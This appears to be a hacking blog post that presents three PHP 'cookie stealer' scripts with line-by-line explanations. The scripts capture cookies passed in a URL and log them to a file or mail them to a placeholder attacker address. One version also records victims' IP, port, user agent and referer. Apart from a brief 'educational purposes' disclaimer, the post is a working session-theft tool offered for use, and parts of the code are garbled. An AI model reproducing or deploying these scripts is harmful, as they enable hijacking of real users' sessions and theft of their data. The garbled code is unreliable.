Here is the simple Cookie Stealer code:
Cookie stored in File:
<?php
$cookie = $HTTP_GET_VARS[“cookie”];
$steal = fopen(“cookiefile.txt”, “a”);
fwrite($steal, $cookie .”\n”);
fclose($steal);
?>
$cookie = $HTTP_GET_VARS[“cookie”]; steal the cookie from the current url(stealer.php?cookie=x)and store the cookies in $cookie variable.
$steal = fopen(“cookiefile.txt”, “a”); This open the cookiefile in append mode so that we can append the stolen cookie.
fwrite($steal, $cookie .”\n”); This will store the stolen cookie inside the file.
fclose($steal); close the opened file.
Another version: Sends cookies to the hacker mail
<?phpThe above code will mail the cookies to hacker mail using the PHP() mail function with subject “Stolen cookies”.
$cookie = $HTTP_GET_VARS[“cookie”]; mail(“hackerid@mailprovider.com”, “Stolen Cookies”, $cookie);
?>
Third Version
<?php
function GetIP()
{
if (getenv(“HTTP_CLIENT_IP”) && strcasecmp(getenv(“HTTP_CLIENT_IP”), “unknown”))
$ip = getenv(“HTTP_CLIENT_IP”);
else if (getenv(“HTTP_X_FORWARDED_FOR”) && strcasecmp(getenv(“HTTP_X_FORWARDED_FOR”), “unknown”))
$ip = getenv(“HTTP_X_FORWARDED_FOR”);
else if (getenv(“REMOTE_ADDR”) && strcasecmp(getenv(“REMOTE_ADDR”), “unknown”))
$ip = getenv(“REMOTE_ADDR”);
else if (isset($_SERVER[‘REMOTE_ADDR’]) && $_SERVER[‘REMOTE_ADDR’] && strcasecmp($_SERVER[‘REMOTE_ADDR’], “unknown”))
$ip = $_SERVER[‘REMOTE_ADDR’];
else
$ip = “unknown”;
return($ip);
}
function logData()
{
$ipLog=”log.txt”;
$cookie = $_SERVER[‘QUERY_STRING’];
$register_globals = (bool) ini_get(‘register_gobals’);
if ($register_globals) $ip = getenv(‘REMOTE_ADDR’);
else $ip = GetIP();
$rem_port = $_SERVER[‘REMOTE_PORT’];
$user_agent = $_SERVER[‘HTTP_USER_AGENT’];
$rqst_method = $_SERVER[‘METHOD’];
$rem_host = $_SERVER[‘REMOTE_HOST’];
$referer = $_SERVER[‘HTTP_REFERER’];
$date=date (“l dS of F Y h:i:s A”);
$log=fopen(“$ipLog”, “a+”);
if (preg_match(“/bhtmb/i”, $ipLog) || preg_match(“/bhtmlb/i”, $ipLog))
fputs($log, “IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie <br>”);
else
fputs($log, “IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie nn”);
fclose($log);
}
logData();
?>
The above Cookie stealer will store the following information:
- Ip address
- port number
- host(usually computer-name)
- user agent
- cookie
This Article is for Educational purpose only, written for
Ethical Hackers. This article is for creating public awareness about
the Internet Risks.
Hi. I'm Dhirendra The Admin of this Blog I'm A Certified Ethical Hacker also a Web Developer With Programming Skills in various Programming Languages.
0 comments:
Post a Comment